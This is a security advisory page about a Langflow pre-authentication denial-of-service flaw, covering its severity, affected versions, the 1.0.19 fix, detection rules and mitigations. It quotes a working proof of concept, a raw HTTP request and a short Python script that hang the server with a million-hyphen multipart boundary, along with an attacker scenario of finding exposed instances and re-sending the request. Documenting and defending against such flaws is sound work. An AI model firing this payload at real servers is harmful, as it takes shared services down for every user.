AI Threat Alert
Langflow versions before 1.0.19 expose a file upload endpoint that processes multipart form data before enforcing any authentication, allowing a single unauthenticated HTTP POST with an oversized boundary string to permanently hang the server for all users. The attack requires zero credentials and zero knowledge of valid flow IDs — the PoC is embedded in the public security advisory, making mass exploitation trivially automatable with a single Python script. Langflow carries 53 prior CVEs and a 77/100 package risk score, signaling chronic security debt in a package with significant AI production adoption. Upgrade to 1.0.19 immediately, or block /api/v1/files/upload/ at your WAF or reverse proxy until patching is complete.
What is the risk?
CVSS 7.5 High with a fully network-accessible, zero-authentication, zero-interaction attack vector (AV:N/AC:L/PR:N/UI:N/A:H). The vulnerability is pre-auth, requires a single malformed HTTP request, and has a public PoC — placing real-world exploit time at near-zero for any attacker with basic scripting ability. Availability impact is complete and persistent: the server hangs indefinitely until restarted, and an attacker can re-trigger immediately upon recovery. While confidentiality and integrity are not directly compromised, DoS of an LLM workflow orchestrator cascades to production AI pipelines, agent automations, and any upstream services depending on the Langflow API. The 53 CVE history elevates organizational risk for adopters beyond this single issue.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Langflow | pip | < 1.0.19 | 1.0.19 |
Do you use Langflow? You're affected.
How severe is it?
What is the attack surface?
What should I do?
4 steps-
PATCH
Upgrade the langflow pip package to >=1.0.19. The fix introduces a check_boundary HTTP middleware that validates the multipart boundary against ^[\w\-]{1,70}$ and rejects malformed requests with HTTP 422 before body parsing; the upload endpoint also now enforces authentication and flow-ownership (get_current_active_user + 403 on mismatch).
-
DETECT
Alert on POST /api/v1/files/upload/ requests from unauthenticated sources with Content-Length >1MB or boundary strings exceeding 70 characters in server access logs.
-
WORKAROUND
If immediate patching is not possible, block or rate-limit /api/v1/files/upload/ at the reverse proxy or WAF layer and enforce a request body size cap (e.g., 10MB in nginx/Caddy) to bound hang duration.
-
NETWORK
Ensure Langflow is never directly internet-exposed; place behind an authentication proxy or VPN for all internal deployments.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-55446?
Langflow versions before 1.0.19 expose a file upload endpoint that processes multipart form data before enforcing any authentication, allowing a single unauthenticated HTTP POST with an oversized boundary string to permanently hang the server for all users. The attack requires zero credentials and zero knowledge of valid flow IDs — the PoC is embedded in the public security advisory, making mass exploitation trivially automatable with a single Python script. Langflow carries 53 prior CVEs and a 77/100 package risk score, signaling chronic security debt in a package with significant AI production adoption. Upgrade to 1.0.19 immediately, or block /api/v1/files/upload/ at your WAF or reverse proxy until patching is complete.
Is CVE-2026-55446 actively exploited?
No confirmed active exploitation of CVE-2026-55446 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-55446?
1. PATCH: Upgrade the langflow pip package to >=1.0.19. The fix introduces a check_boundary HTTP middleware that validates the multipart boundary against ^[\w\-]{1,70}$ and rejects malformed requests with HTTP 422 before body parsing; the upload endpoint also now enforces authentication and flow-ownership (get_current_active_user + 403 on mismatch). 2. DETECT: Alert on POST /api/v1/files/upload/ requests from unauthenticated sources with Content-Length >1MB or boundary strings exceeding 70 characters in server access logs. 3. WORKAROUND: If immediate patching is not possible, block or rate-limit /api/v1/files/upload/ at the reverse proxy or WAF layer and enforce a request body size cap (e.g., 10MB in nginx/Caddy) to bound hang duration. 4. NETWORK: Ensure Langflow is never directly internet-exposed; place behind an authentication proxy or VPN for all internal deployments.
What systems are affected by CVE-2026-55446?
This vulnerability affects the following AI/ML architecture patterns: LLM workflow platforms, agent frameworks, RAG pipelines, model serving.
What is the CVSS score for CVE-2026-55446?
CVE-2026-55446 has a CVSS v3.1 base score of 7.5 (HIGH).
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0029 Denial of AI Service AML.T0034.001 Resource-Intensive Queries AML.T0049 Exploit Public-Facing Application Compliance Controls Affected
What are the technical details?
Original Advisory
### Summary An attacker can send a `/api/v1/files/upload/` request without any authentication token/cookies and abuse a very long multipart form boundary to make the langflow app unusable for all users for an indefinite amount of time. ### Details https://github.com/langflow-ai/langflow/blob/v1.0.18/src/backend/base/langflow/api/v1/files.py#L40 The file upload function will try to process the multipart form data even if it is malformed and contains a payload such as an extremely large amount of hyphens after the boundary. It also does not do the authentication check before trying to process this data so an unauthenticated attacker can perform this as well as authenticated users. Additionally, an attacker doesn't even need to know a valid UUID of a flow to send this request because the server will still try to process the large boundary even with any random value in place of the flow ID. ### PoC An attacker makes this request to upload a file without valid authentication information or a valid flow ID: ``` POST /api/v1/files/upload/test HTTP/1.1 Host: 127.0.0.1:7860 Content-Length: 3000192 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryorGBAKSkv5wR6WqJ Accept: application/json, text/plain, */* Origin: http://127.0.0.1:7860 Accept-Encoding: gzip, deflate, br Connection: keep-alive ------WebKitFormBoundaryorGBAKSkv5wR6WqJ Content-Disposition: form-data; name="file"; filename="dos.txt" Content-Type: text/plain DoS in progress! ------WebKitFormBoundaryorGBAKSkv5wR6WqJ------------<insert a large amount of hyphens such as 1,000,000> ``` Here is the request in python: ```python import requests url = "http://127.0.0.1:7860/api/v1/files/upload/test" headers = { "Content-Type": "multipart/form-data; boundary=---------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ" } data = ( "-----------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ\r\n" "Content-Disposition: form-data; name=\"file\"; filename=\"dos.txt\"\r\n" "Content-Type: text/plain\r\n\r\n" "DoS in progress\r\n" "-----------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ--" + '-' * 1000000 + "\r\n" ) response = requests.post(url, headers=headers, data=data) ``` The app will then be stuck in the "server is busy" state for all users: <img width="733" alt="image" src="https://github.com/user-attachments/assets/227169d8-f1b7-4072-8c09-e416e4808d05"> ### Impact Sending this request will result in the server being unusable for all users for an infinite amount of time because the request can be repeated as much as you want. ### Patches Fixed in **1.0.19** via PR [#3923](https://github.com/langflow-ai/langflow/pull/3923). A `check_boundary` HTTP middleware was added that validates the multipart boundary (`^[\w\-]{1,70}$`) and rejects malformed requests — including the oversized-hyphen payload — with `HTTP 422` **before** the body is parsed. The upload endpoint also gained an authentication and flow-ownership check (`get_current_active_user` + `403` on mismatch), closing the unauthenticated access vector. Upgrade to **1.0.19 or later**.
Exploitation Scenario
An adversary targeting an organization's AI automation stack identifies a publicly exposed Langflow instance via Shodan or OSINT on the company's technology footprint. Without any credentials or knowledge of valid flow IDs, the attacker sends a single HTTP POST to /api/v1/files/upload/test with a multipart Content-Type boundary followed by 1,000,000 hyphens. The Langflow web server worker blocks indefinitely attempting to parse the malformed body before any auth check executes, rendering the entire service unavailable. The attacker scripts a loop to re-send on any service recovery — effectively maintaining a persistent DoS against all LLM workflows, RAG pipelines, and agentic automations running on the instance with minimal infrastructure cost and zero attribution risk.
Weaknesses (CWE)
CWE-400 — Uncontrolled Resource Consumption: The product does not properly control the allocation and maintenance of a limited resource.
- [Architecture and Design] Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.
- [Architecture and Design] Mitigation of resource exhaustion attacks requires that the target system either: The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question. The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker. recognizes the attack and denies that user further access for a given amount of time, or uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References
Timeline
Related Vulnerabilities
CVE-2026-55255 9.9 Langflow: IDOR allows cross-user flow execution
Same package: langflow CVE-2026-33309 9.9 langflow: Path Traversal enables file access
Same package: langflow CVE-2026-33017 9.8 langflow: Code Injection enables RCE
Same package: langflow CVE-2024-37014 9.8 Langflow: unauthenticated RCE via custom component API
Same package: langflow CVE-2026-27966 9.8 langflow: Code Injection enables RCE
Same package: langflow